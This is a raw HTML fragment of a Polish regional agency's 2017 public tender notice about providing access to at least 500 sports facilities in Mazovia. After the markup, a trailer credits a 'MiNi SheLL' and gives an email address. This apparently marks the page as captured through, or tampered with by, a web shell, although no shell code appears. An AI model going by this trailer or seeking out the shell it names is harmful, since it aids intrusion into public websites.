id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-12-28</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">1. Zamawiający nie przewiduje: 1) zawarcia umowy ramowej; 2) dynamicznegosystemu zakupów; 3)wyboru najkorzystniejszej oferty z zastosowaniem aukcjielektronicznej; 4) udzielenie zamówień uzupełniających w trybie zamówienia z wolnejręki; 5) zwrotu kosztów udziału w postępowaniu - wszelkie koszty związane zprzygotowaniem oraz złożeniem oferty ponosi Wykonawca, niezależnie od wynikówpostępowania z wyjątkiem unieważnienia postępowania o udzielenie zamówieniapublicznego z przyczyn leżących po stronie Zamawiającego na podstawie art. 93 ust. 4ustawy P.z.p., kiedy to Wykonawcom, którzy złożyli oferty nie podlegająceodrzuceniu, przysługuje roszczenie o zwrot uzasadnionych kosztów uczestnictwa wpostępowaniu, w szczególności kosztów przygotowania oferty; 6) możliwościprzedstawienia informacji zawartych w ofercie w postaci katalogu elektronicznego lubdołączenia katalogu elektronicznego do oferty; 7) możliwości dokonywania rozliczeńz Wykonawcą w walutach obcych; 8) wniesienia zabezpieczenianależytego wykonania umowy; 9) zmian do zawartej umowy w stosunku do treścioferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zachodzi conajmniej jedna z okoliczności wskazanych w art. 144 ust. 1 pkt 2 - 6 ustawy P.z.p.; 2.W celu umożliwienia porównania Ogłoszenia o zamówieniu oraz SIWZ, zachowanonumerację poszczególnych elementów z SIWZ; 3. Otwarcie ofert odbędzie się w dniu28.12.2017 r., o godz. 11:30, w Siedzibie Mazowieckiej Jednostki WdrażaniaProgramów Unijnych, ul. Jagiellońska 74, 03-301 Warszawa, II Piętro, pokój 240; 4. Wuzupełnieniu informacji wskazanej w pkt IV.2.2 niniejszego ogłoszenia Zamawiającyinformuje, że szczegółowe informacje na temat kryteriów oceny ofert opisano w pkt26.2 SIWZ: 1) Wykonawca, który złoży ofertę z największą liczbą obiektów (powyżejminimalnego wymagania określonego w pkt 14.1.3) SIWZ, tj. o zamówienie mogąubiegać się Wykonawcy, którzy zapewnią dostęp do co najmniej 500 obiektówsportowych na terenie całego województwa mazowieckiego), która nie podlegaodrzuceniu, otrzyma 50 punktów, natomiast pozostali Wykonawcy odpowiednio mniejpunktów według wskazanego wzoru; 2) Minimalna liczba wymaganych obiektówsportowych na terenie całego województwa mazowieckiego wynosi 500. Wykonawca,który wykaże, iż zapewni dostęp mniej niż 500 obiektów sportowych na tereniewojewództwa mazowieckiego, zostanie wykluczony z postępowania z uwagi naniespełnienie minimalnych wymagań Zamawiającego. Ofertę Wykonawcywykluczonego z postępowania uznaje się za odrzuconą; 3) Oferta Wykonawcy, którywykaże, iż zapewni dostęp dokładnie do 500 obiektów sportowych na tereniewojewództwa mazowieckiego, nie otrzyma dodatkowych punktów we wskazanymkryterium; 4) Wszystkie obiekty sportowe na terenie całego województwamazowieckiego, którymi dysponuje lub będzie dysponował Wykonawca należyuwzględnić w Załączniku nr 6 do SIWZ - Wykazie narzędzi, wyposażenia zakładu iurządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówieniapublicznego wraz z informacją o podstawie dysponowania tymi zasobami (Wykazobiektów sportowych); 5. Postępowanie prowadzone jest na podstawie art. 39 ustawyP.z.p.; 6. Dokumentacja dotycząca przedmiotowego postępowania zostałazamieszczona na stronie internetowej Zamawiającego pod adresem:http://bip.mazowia.eu/zamówienia-publiczne/; 7. Zamawiający nie określa standardówjakościowych odnoszących się do wszystkich istotnych cech przedmiotu zamówienia,jak również nie określa w jaki sposób koszty cyklu życia zostały uwzględnione wopisie przedmiotu zamówienia</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com